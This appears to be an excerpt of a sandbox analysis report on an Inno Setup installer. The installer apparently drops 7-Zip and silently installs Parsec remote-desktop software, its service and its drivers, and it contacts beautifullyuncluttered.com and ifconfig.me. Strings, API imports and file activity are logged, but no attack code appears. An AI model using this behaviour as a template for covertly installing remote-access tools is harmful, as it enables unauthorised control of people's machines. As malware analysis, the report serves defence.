Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576173174.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://ocsp.digicert.com0A
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337367644.000001989086D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309499408.0000019890894000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576139520.000001989086E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://ocsp.digicert.com0X
Source: pservice.exe, 00000028.00000003.2742828975.000001989006A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
Source: pservice.exe, 00000028.00000002.3576074424.0000019890860000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedRootG4.crtFj
Source: pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crlv
Source: pservice.exe, 00000028.00000003.2742558824.000001989004D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3336997303.000001989004D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: pservice.exe, 00000028.00000003.2742558824.000001989004D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3336997303.000001989004D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://www.digicert.com/CPS0
Source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.drString found in binary or memory: http://www.unicode.org/copyright.html
Source: uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beautifullyuncluttered.com/
Source: uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beautifullyuncluttered.com/?CheckApp
Source: uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beautifullyuncluttered.com/L
Source: uu8v4UUzTU.tmp, 00000001.00000003.1960296249.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000003.1956522073.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2153836962.00000000008BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me/G
Source: uu8v4UUzTU.tmp, 00000001.00000002.2154346874.00000000039C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me/ip
Source: uu8v4UUzTU.tmp, 00000001.00000003.1960625837.0000000000854000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2153690668.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me/ip5.1ry
Source: uu8v4UUzTU.exe, is-G92OK.tmp.1.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: parsec-vdd.exe, 00000042.00000002.2124360355.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelog
Source: parsec-windows.exe, 0000000C.00000002.2126538465.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000C.00000003.2125830286.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec
Source: parsec-vud.exe, 0000002E.00000002.2092532699.0000000000608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i
Source: parsec-windows.exe, 0000000C.00000002.2126538465.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000C.00000003.2125830286.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092532699.0000000000608000.00000004.00000020.00020000.00000000.sdmp, parsec-vdd.exe, 00000042.00000002.2124360355.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec
Source: uu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002560000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000000.1718977411.0000000000401000.00000020.00000001.01000000.00000004.sdmp, uu8v4UUzTU.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: uu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002560000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000000.1718977411.0000000000401000.00000020.00000001.01000000.00000004.sdmp, uu8v4UUzTU.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_004056DE
Source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_89948d8e-c
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE849.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD48.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.cat (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.catJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.catJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.catJump to dropped file
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCB0.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE76E.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDE94.tmpJump to dropped file
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to dropped file

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0041A720: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C244C0 OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC021850 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,ProcessIdToSessionId,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CloseHandle,CloseHandle,SetTokenInformation,CreateProcessAsUserW,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 12_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 46_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function: 66_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\drvstore.tmp
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\inf\oem4.inf
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\drvstore.tmp
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\inf\oem5.inf
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | File created: C:\Windows\INF\c_display.PNF
Source: C:\Windows\System32\drvinst.exe | File deleted: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDE94.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0043D078
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00425134
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00468806
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0044D9EE
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0041798C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0043AB24
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0043DD64
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0044F022
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_004231C8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0045F1EC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0041C204
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0046328C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00431288
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0044541C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0046E4D1
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0046E5C0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_004565F0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00434640
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0046469D
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_004587AC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0042E8E0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00441984
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00443BBC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0042DCAC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0046DD60
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00417DE8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_0042DF78
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 5_2_00432F00
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 12_2_0040755C
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 12_2_00406D85
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC022130
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC029128
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC025D24
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC025950
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC02557C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC02BDA0
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC02E1C4
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC031E0C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC026A28
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC02EE70
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC029A8C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC025F0C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC025B38
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC02A760
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC025764
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC027784
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC0273B8
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC02C420
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC030878
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC03A89C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC02B8F0
Source: C:\Program Files\Parsec\pservice.exe | Code function: 40_2_00007FF7EC0364E0
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 46_2_0040755C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 46_2_00406D85
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C114B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C60490
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C13190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C268F0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C14740
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C04DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C464AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C3E4A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C0C4D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C5B44C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C043A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C40360
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C2F260
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C3E294
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C03220
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C5A24C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C501C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C491B8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C42130
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C488F0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C3E8B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C248D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C53860
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 49_2_00007FF763C21790
